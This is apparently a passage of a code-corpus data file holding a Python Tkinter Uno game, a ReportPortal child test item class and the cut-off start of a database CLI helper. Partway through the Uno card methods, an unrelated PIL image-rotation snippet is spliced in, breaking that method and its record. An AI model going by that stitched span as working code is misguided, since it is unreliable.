\"Purple\": \"#48406A\",\r\n \"Green\": \"#23863F\",\r\n \"Blue\": \"#40686A\"\r\n }\r\n\r\n\r\nmainBg = bgCols[\"Purple\"]\r\n# #1-#9: 2, Specials: 2, Wilds: 4, #0: 1\r\ncards = [\"Wild\", \"Wild_Draw\", \"Skip\", \"Draw\", \"Reverse\"] + [str(n) for n in range(10)]\r\n\r\ncanvas = Canvas(root, width=1126, height=700, bg=mainBg)\r\ncanvas.place(relx=0.225,rely=0.5, anchor=\"w\")\r\n \r\ncolourPicker = {\"Red\": canvas.create_image(int(canvas[\"width\"])/2+250, int(canvas[\"height\"])/2-100,image=images[\"Red\"], state=\"hidden\"),\r\n \"Yellow\": canvas.create_image(int(canvas[\"width\"])/2+180, int(canvas[\"height\"])/2-30,image=images[\"Yellow\"], state=\"hidden\"), # 181, -30\r\n \"Blue\": canvas.create_image(int(canvas[\"width\"])/2+320, int(canvas[\"height\"])/2-30,image=images[\"Blue\"], state=\"hidden\"), # 322, -31\r\n \"Green\": canvas.create_image(int(canvas[\"width\"])/2+250, int(canvas[\"height\"])/2+40,image=images[\"Green\"], state=\"hidden\") # 251, 39\r\n }\r\n\r\nclass Card():\r\n def __init__(self, name, displayName, colour, cardType, worth): \r\n self.name = name\r\n self.colour = colour\r\n self.cardType = cardType\r\n self.worth = worth\r\n self.animating = True\r\n self.up = False\r\n self.displayName = displayName\r\n self.time = 100\r\n #print(name, colour, cardType)\r\n self.rawImage = Image.open(f\"{folder}/{name}.png\").convert(\"RGBA\")\r\n self.backRaw = Image.open(f\"{folder}/Back.png\").convert(\"RGBA\")\r\n self.storedImage = ImageTk.PhotoImage(self.rawImage)\r\n # Height and width don't matter for a label without text (input is overriden, regardless of value)\r\n #self.main = Label(canvas, image=self.storedImage, bg=mainBg)\r\n self.main = canvas.create_image(int(canvas[\"width\"])/2+self.storedImage.width(), int(canvas[\"height\"])/2, image=self.storedImage, state=\"hidden\")\r\n\r\n def disable(self):\r\n canvas.tag_unbind(self.main, \"<1>\")\r\n \r\n def RightToCentre(self): # Placed on right of canvas, rotated 90* to face center.\r\n #self.main[\"image\"] = images[\"R_Back\"]\r\n #self.main.unbind(\"<1>\")\r\n 
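# The Uno code above (and the methods just below) re-render card images with
# PIL's Image.rotate; expand=True grows the canvas so a 90-degree rotation is
# not clipped. The call on a synthetic image, no asset files required:
from PIL import Image

card = Image.new("RGBA", (60, 90), (200, 30, 30, 255))
sideways = card.rotate(90, expand=True)
print(card.size, "->", sideways.size)  # (60, 90) -> (90, 60)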
self.backImage = ImageTk.PhotoImage(self.backRaw.rotate(90, expand=True))\r\n canvas.itemconfig(self.main, image=self.backImage)\r\n self.disable()\r\n\r\n def LeftToCentre(self): # Placed on left of canvas, rotated 90* to face center\r\n self.backImage = ImageTk.PhotoImage(self.backRaw.rotate(-90, expand=True))\r\n canvas.itemconfig(self.main, image=self.backImage)\r\n self.disable()\r\n\r\n def Reverse(self): # Placed on top of convas, rotated 180* to face center\r\n self.backImage = ImageTk.PhotoImage(self.backRaw.rotate(180))\r\n canvas.itemconfig(self.main, image=self.backImage)\r\n self.disable()\r\n\r\n def Normal(self): # Placed on bottom of canvas. Normal card image\r\n canvas.itemconfig(self.main, image=self.storedImage)\r\n canvas.tag_bind(self.main, \"<1>\", self.attemptCardUsage)\r\n\r\n def animateUp(self):\r\n if self.animating: return\r\n self.animating = True\r\n base = canvas.coords(self.main)\r\n animateWidgetMovement(self.main, base[0], base[1]-self.storedImage.height()/2, self.time)\r\n root.after(self.time, self.toggleUp, True)\r\n\r\n def animateDown(self):\r\n if self.animating: return\r\n self.animating = True\r\n base = canvas.coords(self.main)\r\n animateWidgetMovement(self.main, base[0], base[1]+self.storedImage.height()/2, self.time)\r\n root.after(self.time, self.toggleUp, False)\r\n\r\n def toggleUp(self, val):\r\n self.up = val\r\n self.animating = False\r\n \r\n \r\n def isUsable(self):\r\n if not game.started:\r\n game.log.output(\"Game has not started yet!\")\r\n return False\r\n elif self.name.find(\"Wild\") > -1 or self.colour == game.deck.lastCardUsed.colour or self.cardType == game.deck.lastCardUsed.cardType:\r\n return True\r\n \r\n def attemptCardUsage(self, event):\r\n if self.isUsable() and game.turnNumber == 0 and not game.pickingColour:\r\n self.use(game.user)\r\n\r\n def use(self, player):\r\n game.log.output(f\"{player.name} played {self.displayName}\")\r\n # Remove card from holder's hand\r\n for i, cardObj in enumerate(player.hand):\r\n if cardObj == self:\r\n player.hand.pop(i)\r\n player.visualiseHand(len(player.hand))\r\n break\r\n game.deck.updateLastUsed(self)\r\n if len(player.hand) == 1 :\r\n if game.uno: # Shout Uno\r\n game.log.output(f\"{player.name}: UNO!\")\r\n else: #Failed to say uno, punish player\r\n game.log.output(f\"{player.name} failed to say UNO! Drawing 2 cards as punishment.\")\r\n player.draw(2)\r\n incrementTurn = True\r\n if self.cardType == \"Reverse\":\r\n if game.playerCount == 2: # Functions as skip\r\n game.skipNext = True\r\n else: # Else reverse order\r\n game.increment *= -1\r\n elif self.cardType == \"Skip\":\r\n game.skipNext = True\r\n elif self.cardType == \"Draw\":\r\n game.skipNext = True # Skip next Turn\r\n # Force next to draw cards before skipping\r\n game.turnList[game.simplifyTurnNumber(False, game.increment)].draw(2)\r\n elif self.cardType == \"Wild\":\r\n if self.name == \"Wild_Draw\": # Wild draw 4, check legality\r\n legal = True\r\n for cardObj in player.hand:\r\n if cardObj.colour == game.deck.usedPile[-1].colour and cardObj.cardType != \"Wild\": # Illegal!!\r\n legal = False\r\n break\r\n if legal:\r\n game.skipNext = True # Skip next\r\n # Force next to draw cards before skipping \r\n game.turnList[game.simplifyTurnNumber(False, game.increment)].draw(4)\r\n else: # Not legal, punish user\r\n game.log.output(\"Illegal Wild Draw 4 played. 
User will draw 4 cards as punishment\")\r\n player.draw(4)\r\n if player == game.user and len(player.hand) > 0:\r\n game.pickingColour = True\r\n toggleColourPicker(\"normal\")\r\n incrementTurn = False\r\n\r\n if len(player.hand) == 0: # game over\r\n # Tally points and display winner\r\n totalScore = 0\r\n for plr in game.players:\r\n for cardObj in plr.hand:\r\n totalScore += cardObj.worth\r\n # Return card to deck and hide\r\n game.deck.cards.append(cardObj)\r\n plr.hand = []\r\n game.log.output(f\"{player.name} won, scoring {totalScore} points!\")\r\n if player == game.user:\r\n game.log.output(\"Congratulations!\")\r\n else:\r\n game.log.output(\"Better luck next time!\")\r\n \r\n # Return discard pile to deck\r\n game.deck.cards += game.deck.usedPile\r\n game.deck.usedPile = []\r\n game.deck.cards.append(game.deck.lastCardUsed)\r\n game.deck.lastCardUsed = None\r\n # Hide all cards in deck\r\n for cardObj in game.deck.cards:\r\n canvas.itemconfig(cardObj.main, state=\"hidden\")\r\n canvas.coords(cardObj.main,int(canvas[\"width\"])/2+self.storedImage.width(), int(canvas[\"height\"])/2) \r\n\r\n # Hide deck\r\n game.deck.main.place_forget()\r\n \r\n # Hide uno button\r\n canvas.itemconfig(game.unoButton, state=\"hidden\")\r\n \r\n # Show title screen\r\n game.displayTitleScreen(True)\r\n \r\n elif incrementTurn: # next turn\r\n game.incTurn()\r\n\r\n\r\nclass Deck():\r\n def __init__(self):\r\n self.cards = []\r\n self.usedPile = []\r\n self.lastCardUsed = None\r\n # Add cards of each colour\r\n for colour in [\"Yellow\", \"Red\", \"Green\", \"Blue\"]:\r\n # Add cards of each type\r\n for cardType in cards:\r\n name = f\"{colour}_{cardType}\"\r\n displayName = f\"{colour} {cardType}\"\r\n times = 1\r\n if len(cardType) == 1: # Number card\r\n worth = int(cardType)\r\n if cardType != \"0\": #1-9 number card. Make twice.\r\n times = 2\r\n elif cardType.find(\"Wild\") > -1: # Wild card. Make once (total 4).\r\n worth = 50\r\n name = cardType\r\n cardType = \"Wild\"\r\n if name == \"Wild_Draw\":\r\n displayName = \"Wild Draw 4\"\r\n else:\r\n displayName = \"Wild Card\"\r\n else: # Special card. Make twice.\r\n worth = 20\r\n times = 2\r\n self.cards.append(Card(name, displayName, colour, cardType, worth))\r\n if times == 2:\r\n self.cards.append(Card(name, displayName, colour, cardType, worth))\r\n\r\n self.cardHeight = self.cards[0].storedImage.height() + 2\r\n self.cardWidth = self.cards[0].storedImage.width() + 2\r\n self.main = Label(canvas, image=images[\"Deck\"], bg=mainBg)\r\n self.main.bind(\"<1>\", self.drawAttempted)\r\n\r\n def shuffle(self):\r\n try:\r\n from random import shuffle\r\n shuffle(self.cards)\r\n game.log.output(f\"Deck successfully shuffled! 
{len(self.cards)} cards remaining!\")\r\n except Exception as e:\r\n game.log.output(f\"Failed to shuffle deck:\\n\\n {e}\", error=True)\r\n\r\n def drawAttempted(self, event):\r\n if game.turnNumber == 0 and game.started: # Only let them draw if it's their turn \r\n game.user.draw()\r\n if not game.user.hand[-1].isUsable(): # can't use card, so end turn\r\n game.incTurn()\r\n\r\n def createUsedPile(self):\r\n #self.usedPileLabel.place(relx=0.5, rely=0.5,anchor=\"e\")\r\n self.lastCardUsed = game.deck.cards[0]\r\n # animate showing card \"discard\"\r\n finalX = int(canvas[\"width\"])/2 - self.cardWidth//1.5\r\n time = 200\r\n animateWidgetMovement(self.lastCardUsed.main, finalX, int(canvas[\"height\"])/2, time)\r\n root.after(int(time), self.checkUsedPile, time)\r\n\r\n def checkUsedPile(self, time):\r\n if self.lastCardUsed.name == \"Wild_Draw\":\r\n # Wild Draw 4 = Reshuffle + new discard\r\n game.log.output(\"Wild Draw 4 was first in the discard pile. Reshuffling to pick a new card!\")\r\n finalX = int(canvas[\"width\"])/2 + self.cardWidth\r\n animateWidgetMovement(self.lastCardUsed.main, finalX, int(canvas[\"height\"])/2, time/3*2)\r\n self.shuffle()\r\n root.after(int(time/3*2), self.createUsedPile)\r\n else:\r\n del self.cards[0]\r\n if self.lastCardUsed.name == \"Wild\":\r\n game.pickingColour = True\r\n toggleColourPicker(\"normal\")\r\n else:\r\n game.started = True\r\n for cardObj in game.user.hand:\r\n cardObj.animating = False\r\n \r\n if self.lastCardUsed.name == \"Skip\": # Skip player 1's turn\r\n game.turnNumber = 1\r\n game.log.output(f\"{game.user.name} had their turn skipped\")\r\n elif self.lastCardUsed.name == \"Draw\": # Player 1 draws 2 and loses turn\r\n game.user.draw(2)\r\n game.log.output(f\"{game.user.name} had their turn skipped\")\r\n game.turnNumber = 1\r\n elif self.lastCardUsed.name == \"Reverse\": # Reverse order and skip player's turn\r\n game.log.output(\"Direction of play reversed!\")\r\n game.turnNumber = game.playerCount-1\r\n game.increment = -1\r\n \r\n\r\n def updateLastUsed(self, card):\r\n self.usedPile.append(self.lastCardUsed)\r\n # Hide prior last card\r\n root.after(250, canvas.coords, self.lastCardUsed.main, -1*self.cardWidth, -1*self.cardHeight)\r\n # Update and show new last card\r\n self.lastCardUsed = card\r\n card.animating = True\r\n animateWidgetMovement(card.main, int(canvas[\"width\"])/2 - self.cardWidth//1.5, int(canvas[\"height\"])/2, 250)\r\n canvas.itemconfig(card.main, image=card.storedImage)\r\n\r\n def remakeDeck(self): # Shuffle used pile into deck\r\n self.cards = self.usedPile\r\n self.usedPile = []\r\n self.shuffle()\r\n # Place cards under deck\r\n for cardObj in self.cards:\r\n canvas.coords(cardObj.main, int(canvas[\"width\"])/2+self.cardWidth, int(canvas[\"height\"])/2)\r\n \r\nclass Player(): # User & Computers\r\n def __init__(self, name, playerNumber, colour): \r\n self.name = name\r\n self.hand = []\r\n self.num = playerNumber\r\n self.colour = colour\r\n self.turn = self.num == 1 # True if player, false if computer\r\n game.log.main.tag_configure(f\"PlayerNum{self.num}\", foreground=self.colour)\r\n # Set up main anchor positions for cards in hand\r\n height = game.deck.cardHeight\r\n width = game.deck.cardWidth\r\n if self.num == 1: # Bottom\r\n self.xVal = int(canvas[\"width\"])/2 + width/2 # relx = 0.5\r\n self.yVal = int(canvas[\"height\"]) - height/2 - 10\r\n elif self.num == 2: # Top\r\n self.xVal = int(canvas[\"width\"])/2 + width/2 # relx = 0.5\r\n self.yVal = 10 + height/2\r\n elif self.num == 4: # 
Left\r\n self.xVal = 10 + height/2\r\n self.yVal = int(canvas[\"height\"])/2 + width/2 # rely = 0.5\r\n else: # Right\r\n # subtract height because cards are \"rotated\"\r\n self.xVal = int(canvas[\"width\"])- height/2 - 10 \r\n self.yVal = int(canvas[\"height\"])/2 + width/2 # rely = 0.5\r\n self.draw(7, bulk=True)\r\n \r\n def visualiseHand(self, handSize, time=200): # Visualisation\r\n if self.num <= 2: # Top or bottom. Alter x-axis per card.\r\n xVal = self.xVal - (handSize * game.deck.cardWidth / 2)\r\n xInc = game.deck.cardWidth\r\n yVal = self.yVal\r\n yInc = 0\r\n else: # Left or right. Alter y-axis per card\r\n xVal = self.xVal\r\n xInc = 0\r\n yVal = self.yVal - (handSize * game.deck.cardWidth /2)\r\n yInc = game.deck.cardWidth\r\n for i in range(handSize):\r\n self.hand[i].animating = True # Prevent animation being intervened with\r\n animateWidgetMovement(self.hand[i].main, xVal+(i*xInc), yVal+(i*yInc), time)\r\n root.after(time, self.hand[i].toggleUp, False) # Disables animating\r\n\r\n def draw(self, amount=1, bulk=False):\r\n time = 100\r\n try:\r\n for i in range(amount):\r\n if len(game.deck.cards) == 0:\r\n game.log.output(\"Deck out of cards. Shuffling used pile into deck!\")\r\n game.deck.remakeDeck()\r\n self.hand.append(game.deck.cards.pop(0))\r\n canvas.itemconfig(self.hand[-1].main, state=\"normal\")\r\n if self.num == 1: # Bottom\r\n self.hand[-1].Normal() \r\n elif self.num == 2: # Top\r\n self.hand[-1].Reverse()\r\n elif self.num == 4: # Left\r\n self.hand[-1].LeftToCentre()\r\n else: # Right\r\n self.hand[-1].RightToCentre()\r\n if not bulk:\r\n delay = 300*i\r\n else:\r\n delay = time*(i+(self.num-1)*amount)\r\n root.after(delay, self.visualiseHand, len(self.hand), time)\r\n if amount == 1:\r\n game.log.output(f\"{self.name} drew 1 card\")\r\n elif amount > 0:\r\n game.log.output(f\"{self.name} drew {amount} cards\")\r\n if bulk and self.num == game.playerCount:\r\n root.after(delay+time, game.deck.createUsedPile)\r\n except Exception as e:\r\n game.log.output(f\"{self.name} failed to draw {amount} total cards \\n\\n {e}\", error=True)\r\n\r\n def botPlay(self):\r\n #game.log.output(f\"{self.name} invoked botPlay\")\r\n usableCards = []\r\n colours = []\r\n wild4Present = False\r\n wild4Allowed = True\r\n delay = 0\r\n for cardObj in self.hand:\r\n # Make a list of usable cards in hand\r\n if cardObj.isUsable():\r\n usableCards.append(cardObj)\r\n if cardObj.name == \"Wild_Draw\":\r\n wild4Present = True\r\n # Make a list of colours in hand\r\n if cardObj.cardType != \"Wild\":\r\n colours.append(cardObj.colour)\r\n\r\n # If no usable cards, draw a card. 
If that can be used, use it.\r\n if len(usableCards) == 0:\r\n self.draw()\r\n if self.hand[-1].isUsable():\r\n usableCards.append(self.hand[-1])\r\n delay = 300 # Allows the draw animation to occur\r\n # Confirm whether wild draw 4 is legal (auto-legal if it's the only card in hand, hence \"elif\" instead of \"if\")\r\n elif wild4Present and game.deck.lastCardUsed.colour in colours:\r\n wild4Allowed = False\r\n\r\n # Pick a random legal card from usableCards, if any cards left\r\n if len(usableCards) > 0:\r\n card = choice(usableCards)\r\n while card.name == \"Wild_Draw\" and not wild4Allowed:\r\n card = choice(usableCards)\r\n root.after(delay, self.botUse, card, colours) # Allows the draw animation to occur, if necessary\r\n else: # No playable card, end turn\r\n game.incTurn()\r\n \r\n def botUse(self, card, colours):\r\n if len(self.hand) == 2 and not game.uno: # Need to \"say\" UNO\r\n game.toggleUno()\r\n card.use(self)\r\n if card.name.find(\"Wild\") > -1 and len(self.hand) > 0:\r\n if len(colours) > 0:\r\n game.changeWildColour(None, colours)\r\n else:\r\n game.changeWildColour(None)\r\n \r\n \r\nclass CustomText(Text):\r\n def __init__(self, *args, **kwargs):\r\n Text.__init__(self, *args, **kwargs)\r\n\r\n def highlight_pattern(self, pattern, tag, start=\"1.0\", end=\"end\", regexp=False):\r\n self.mark_set(\"matchStart\", self.index(start))\r\n self.mark_set(\"matchEnd\", self.index(start))\r\n self.mark_set(\"searchLimit\", self.index(end))\r\n\r\n count = IntVar()\r\n while True:\r\n index = self.search(pattern, \"matchEnd\", \"searchLimit\", count=count, regexp=regexp)\r\n if index == \"\": break\r\n self.mark_set(\"matchStart\", index)\r\n self.mark_set(\"matchEnd\", \"%s+%sc\" % (index, count.get()))\r\n self.tag_add(tag, \"matchStart\", \"matchEnd\")\r\n \r\nclass Log():\r\n def __init__(self):\r\n widthVal = 301\r\n heightVal = 612\r\n self.frame = Frame(root, width=widthVal, height=heightVal, bg=col)\r\n self.frame.place(x=10, rely=0.5, anchor=\"w\")\r\n self.main = CustomText(self.frame, width=33, height=32, state=\"disabled\", wrap=WORD, bg=\"grey\", fg=\"white\", font=(\"ArialBold\", 13))\r\n self.main.place(x=0,y=0)\r\n self.main.tag_configure(\"error\", background=\"yellow\", foreground = \"red\")\r\n self.lastLineAppearedTwice = False # Can be done w/o variable, but this way is mentally easier and takes less code\r\n\r\n def output(self, msg, error=False):\r\n self.main[\"state\"] = \"normal\"\r\n # If same message, add \"x\" number to end of last line. 
Else add new line.\r\n if self.main.get(\"end-2l\", \"end-2l lineend\").find(msg) > -1:\r\n if not self.lastLineAppearedTwice: # Just add \"x2\"\r\n self.main.insert(\"end-2l lineend\", \" x2\")\r\n else: # Remove & record characters until reach the \"x\"\r\n lastLine = self.main.get(\"end-2l\", \"end-2l lineend\")\r\n # Reverse line, get number, reverse number back to normal\r\n number = lastLine[::-1][:lastLine[::-1].find(\"x\")][::-1]\r\n self.main.delete(f\"end-{len(number)+2}c\", \"end-2l lineend\")\r\n self.main.insert(\"end-2l lineend\", str(int(number)+1))\r\n self.lastLineAppearedTwice = True\r\n else:\r\n self.lastLineAppearedTwice = False\r\n self.main.insert(END, \"- \" + str(msg) + \"\\n\")\r\n for plr in game.players: # Colour code names\r\n self.main.highlight_pattern(plr.name, f\"PlayerNum{plr.num}\", start=\"end-2l\")\r\n if error: # Highlight error line\r\n self.main.highlight_pattern(self.main.get(\"end-4l\", \"end-2l lineend\"), \"error\", start=\"end-4l\")\r\n self.main.insert(\"end-4l+2c\", \"ERROR: \")\r\n self.main[\"state\"] = \"disabled\"\r\n self.main.see(\"end\") # end-2l lineend gives a headache when playing\r\n\r\n def update(self):\r\n for plr in game.players:\r\n self.main.highlight_pattern(plr.name, f\"PlayerNum{plr.num}\")\r\n\r\nclass Game(): \r\n def __init__(self):\r\n self.players = []\r\n self.started = False\r\n self.skipNext = False\r\n self.uno = False\r\n self.pickingColour = False\r\n self.playerCount = 2\r\n self.turnList = []\r\n self.turnNumber = 0\r\n self.increment = 1\r\n self.botDelay = 1000\r\n self.firstGame = True\r\n\r\n # Title screen widgets\r\n width = int(canvas[\"width\"])\r\n height = int(canvas[\"height\"])\r\n \r\n self.title = canvas.create_image(width/2, height/3, image=images[\"UNO\"])\r\n self.playButton = canvas.create_image(width/2, height//1.4, image=images[\"Start\"])\r\n canvas.tag_bind(self.playButton, \"<1>\", self.hideTitleScreen)\r\n\r\n # Choosing player count screen widgets\r\n self.playerCountLabel = canvas.create_text(width/2 , height/5, text=\"Choose player count of \", font=(\"Arial\", 50), fill=\"white\", state=\"hidden\")\r\n\r\n self.player2Background = canvas.create_image(width/3, height/2, image=images[\"Red\"], state=\"hidden\")\r\n self.player3Background = canvas.create_image(width/2, height/2, image=images[\"Green\"], state=\"hidden\")\r\n self.player4Background = canvas.create_image(width/3*2, height/2, image=images[\"Blue\"], state=\"hidden\")\r\n\r\n self.player2Label = canvas.create_text(width/3, height/2, text=\"2\", state=\"hidden\", font=(\"Arial\", 50))\r\n self.player3Label = canvas.create_text(width/2, height/2, text=\"3\", state=\"hidden\", font=(\"Arial\", 50))\r\n self.player4Label = canvas.create_text(width/3*2, height/2, text=\"4\", state=\"hidden\", font=(\"Arial\", 50))\r\n\r\n self.playerCountWidgets = {\r\n \"label\": self.playerCountLabel,\r\n \"2bg\": self.player2Background, \"3bg\": self.player3Background, \"4bg\": self.player4Background,\r\n \"2label\": self.player2Label, \"3label\": self.player3Label, \"4label\": self.player4Label\r\n }\r\n \r\n for k, widget in self.playerCountWidgets.items():\r\n if k != \"label\":\r\n canvas.tag_bind(widget, \"<1>\", self.playerCountButtonClicked)\r\n\r\n\r\n def playerCountButtonClicked(self, event):\r\n for k, widget in self.playerCountWidgets.items():\r\n if widget == canvas.find_withtag(CURRENT)[0]:\r\n self.real_init(int(k[0]))\r\n \r\n def real_init(self, playerCount):\r\n # Hide widgets related to choosing player count\r\n for k, 
widget in self.playerCountWidgets.items():\r\n canvas.itemconfig(widget, state=\"hidden\")\r\n \r\n # Place & shuffle deck\r\n self.deck.main.place(relx=0.5, rely=0.5, anchor=\"w\")\r\n self.deck.shuffle()\r\n \r\n # Make all cards visible in advance\r\n for cardObj in self.deck.cards:\r\n canvas.itemconfig(cardObj.main, state=\"normal\")\r\n # Just in case, re-move card objects in advance\r\n canvas.coords(cardObj.main,int(canvas[\"width\"])/2+self.deck.cardWidth, int(canvas[\"height\"])/2) \r\n canvas.itemconfig(cardObj.main, image=cardObj.storedImage)\r\n # Clear log\r\n self.log.main.delete(1.0, END)\r\n \r\n # Create players\r\n self.playerCount = playerCount\r\n playerHighlights = [\"red3\",\"CadetBlue3\", \"DarkGoldenRod2\", \"plum3\"]\r\n self.user = Player(\"Player1\", 1, playerHighlights[0])\r\n self.players.append(self.user)\r\n for i in range(1, self.playerCount):\r\n self.players.append(Player(f\"Computer{i}\", i+1, playerHighlights[i]))\r\n self.log.update()\r\n\r\n # Alter turnList to maintain a clockwise playing motion (yes, it's actually anti-clockwise)\r\n if self.playerCount == 2:\r\n self.turnList = self.players\r\n else:\r\n self.turnList = [self.user, self.players[2], self.players[1]]\r\n self.players[2].name, self.players[1].name = self.players[1].name, self.players[2].name\r\n self.players[2].colour, self.players[1].colour = self.players[1].colour, self.players[2].colour\r\n if self.playerCount == 4:\r\n self.turnList.append(self.players[3])\r\n \r\n # Show uno button\r\n canvas.itemconfig(self.unoButton, state=\"normal\")\r\n # Bind motion\r\n canvas.bind(\"<Motion>\", motion)\r\n\r\n def toggleUno(self, event=None):\r\n self.uno = not self.uno\r\n if self.uno:\r\n self.log.output(\"Uno status toggled on\")\r\n else:\r\n self.log.output(\"Uno status toggled off\")\r\n \r\n def incTurn(self):\r\n # Proceed to next \"player\"'s turn\r\n self.turnNumber += self.increment\r\n self.uno = False\r\n # Allow turn skips\r\n if self.skipNext:\r\n # Simplify turn number\r\n self.simplifyTurnNumber()\r\n # Skip turn\r\n self.log.output(f\"{self.turnList[self.turnNumber].name} had their turn skipped!\")\r\n self.turnNumber += self.increment\r\n self.skipNext = False\r\n # Simplify turn number\r\n self.simplifyTurnNumber()\r\n # Let computer play turn\r\n game.log.output(f\"{self.turnList[self.turnNumber].name}'s turn!\")\r\n if self.turnNumber != 0:\r\n root.after(self.botDelay, self.turnList[self.turnNumber].botPlay)\r\n\r\n def simplifyTurnNumber(self, alter=True, offset=0):\r\n num = self.turnNumber + offset\r\n while num >= self.playerCount:\r\n num -= self.playerCount\r\n # For negative increments, make sure it's at least zero\r\n while num < 0:\r\n num += self.playerCount\r\n if alter:\r\n self.turnNumber = num\r\n else:\r\n return num\r\n \r\n def changeWildColour(self, event, colours=[\"Red\", \"Green\", \"Blue\", \"Yellow\"]):\r\n toggleColourPicker(\"hidden\")\r\n colour = \"\"\r\n if event: # Was clicked (by a player), pick chosen colour\r\n for key, obj in colourPicker.items():\r\n if canvas.find_withtag(CURRENT)[0] == obj:\r\n colour = key\r\n else: # Bot chooses\r\n colour = choice(colours)\r\n self.deck.lastCardUsed.colour = colour\r\n game.log.output(f\"{self.turnList[self.turnNumber].name} has picked the colour {colour}\")\r\n game.pickingColour = False\r\n if event and not game.started: # Triggered by wild being first discarded card\r\n game.started = True\r\n for cardObj in game.user.hand:\r\n cardObj.animating = False\r\n else:\r\n self.incTurn()\r\n\r\n def 
displayTitleScreen(self, restart=False):\r\n if restart:\r\n # Reset Variables\r\n game.started = False\r\n self.skipNext = False\r\n self.uno = False\r\n self.pickingColour = False\r\n self.turnList = []\r\n self.turnNumber = 0\r\n self.increment = 1\r\n self.firstGame = False\r\n # Unbind motion event\r\n canvas.unbind(\"<Motion>\")\r\n # Empty player list\r\n for i in game.players:\r\n del game.players[0]\r\n game.players = []\r\n else:\r\n # Create log and deck for first time\r\n self.log = Log()\r\n self.deck = Deck()\r\n # Create uno button\r\n self.unoButton = canvas.create_image(int(canvas[\"width\"])/2+self.deck.cardWidth, int(canvas[\"height\"])/2+1.25*(self.deck.cardHeight), image=images[\"UNO_Button\"], state=\"hidden\")\r\n canvas.tag_bind(self.unoButton, \"<1>\", self.toggleUno)\r\n\r\n # Display title screen\r\n canvas.itemconfig(self.playButton, state=\"normal\")\r\n canvas.itemconfig(self.title, state=\"normal\")\r\n\r\n def hideTitleScreen(self, event):\r\n # Hide title screen\r\n canvas.itemconfig(self.playButton, state=\"hidden\")\r\n canvas.itemconfig(self.title, state=\"hidden\")\r\n\r\n # Display widgets related to picking player count\r\n for k, widget in self.playerCountWidgets.items():\r\n canvas.itemconfig(widget, state=\"normal\")\r\n\r\n \r\n\r\ndef animateWidgetMovement(label, finalX, finalY, time):\r\n baseX = canvas.coords(label)[0]\r\n baseY = canvas.coords(label)[1]\r\n deltaX = finalX-baseX\r\n deltaY = finalY-baseY\r\n \r\n duration = int(time)\r\n # Animate movement\r\n for i in range(1, duration + 1):\r\n root.after(int(i*(time/duration)), canvas.coords, label, baseX+i*(deltaX/duration), baseY+i*(deltaY/duration))\r\n\r\n root.after(duration, canvas.coords, label, finalX, finalY) # Make sure it reaches the final destination\r\n \r\ndef motion(event):\r\n if not game.started: return\r\n # Animates movement of cards in hand when hovered over by the user\r\n item = canvas.find_withtag(CURRENT)\r\n for cardObj in game.user.hand:\r\n if len(item) > 0 and cardObj.main == item[0]:\r\n # By splitting the if statements, prevents the elif from taking place when not wanted.\r\n if not cardObj.up:\r\n cardObj.animateUp()\r\n elif cardObj.up:\r\n cardObj.animateDown()\r\n\r\ndef toggleColourPicker(newState):\r\n for k, obj in colourPicker.items():\r\n canvas.itemconfigure(obj, state=newState)\r\n \r\ngame = Game()\r\ngame.displayTitleScreen()\r\n\r\nfor k, obj in colourPicker.items():\r\n canvas.tag_bind(obj,\"<1>\", game.changeWildColour)\r\n","sub_path":"Uno (Revamped).py","file_name":"Uno (Revamped).py","file_ext":"py","file_size_in_byte":31654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"19664082","text":"\"\"\"\nThis module contains functionality for Child RP test item management.\n\nCopyright (c) 2018 http://reportportal.io .\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nfrom weakref import proxy\n\nfrom reportportal_client.core.rp_requests import ItemStartRequest\nfrom 
reportportal_client.items.rp_test_items.rp_base_test_item import \\\n RPBaseTestItem\n\n\nclass RPChildTestItem(RPBaseTestItem):\n \"\"\"This model stores attributes for RP child test items.\"\"\"\n\n def __init__(self, rp_url, session, project_name, parent_item,\n item_name, item_type, launch_uuid, generated_id,\n **kwargs):\n \"\"\"Initialize instance attributes.\n\n :param rp_url: report portal url\n :param session: Session object\n :param project_name: RP project name\n :param item_name: RP item name\n :param item_type: Type of the test item. Allowable values: \"suite\",\n \"story\", \"test\", \"scenario\", \"step\",\n \"before_class\", \"before_groups\", \"before_method\",\n \"before_suite\", \"before_test\", \"after_class\",\n \"after_groups\", \"after_method\", \"after_suite\",\n \"after_test\"\n :param launch_uuid: Parent launch UUID\n :param generated_id: Id generated to speed up client\n :param kwargs: Dict of additional named parameters\n \"\"\"\n super(RPChildTestItem, self).__init__(rp_url, session,\n project_name, item_name,\n item_type, launch_uuid,\n generated_id, **kwargs)\n self.parent_item = proxy(parent_item)\n self.parent_item.add_child_item(self)\n self.weight = self.parent_item.weight + 1\n\n def start(self, api_version, start_time):\n \"\"\"Create request object to start child test item.\n\n :param api_version: RP API version\n :param start_time: Test item start time\n \"\"\"\n endpoint = \"{url}/{api_version}/{project_name}/item/\" \\\n \"{parentItemUuid}\". \\\n format(url=self.rp_url, api_version=api_version,\n project_name=self.project_name,\n parentItemUuid=self.parent_item.uuid)\n\n self.add_request(endpoint, self.session.post, ItemStartRequest,\n self.item_name, start_time,\n self.item_type, self.launch_uuid,\n attributes=self.attributes, code_ref=self.code_ref,\n description=self.description,\n has_stats=self.has_stats,\n parameters=self.parameters,\n retry=self.retry, uuid=self.uuid,\n unique_id=self.unique_id)\n","sub_path":"reportportal_client/items/rp_test_items/rp_child_test_item.py","file_name":"rp_child_test_item.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"73027315","text":"import os\nimport pyhdb\nimport click\nfrom cli_helpers.tabular_output import TabularOutputFormatter\nfrom dotenv import load_dotenv\nfrom common.utils import timer\nfrom ast import literal_eval\n\n\nload_dotenv()\n\n\nclass DBObj:\n def __init__(self, prefix):\n self.host = os.getenv('%s_db_host' % prefix)\n self.port = os.getenv('%s_db_port' % prefix)\n self.username = os.getenv('%s_db_username' % prefix)\\\n if os.getenv('%s_db_username' % prefix)\\\n else os.getenv('%s_db_username' % 'default')\n self.pwd = os.getenv('%s_db_pwd' % prefix)\\\n if 